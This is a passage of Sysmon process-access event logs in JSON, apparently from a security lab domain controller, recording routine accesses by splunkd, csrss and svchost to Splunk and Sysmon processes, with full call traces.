Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A1-5F25-0000-0010639B0900}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A1-5F25-0000-0010639B0900}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A1-5F25-0000-0010639B0900}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 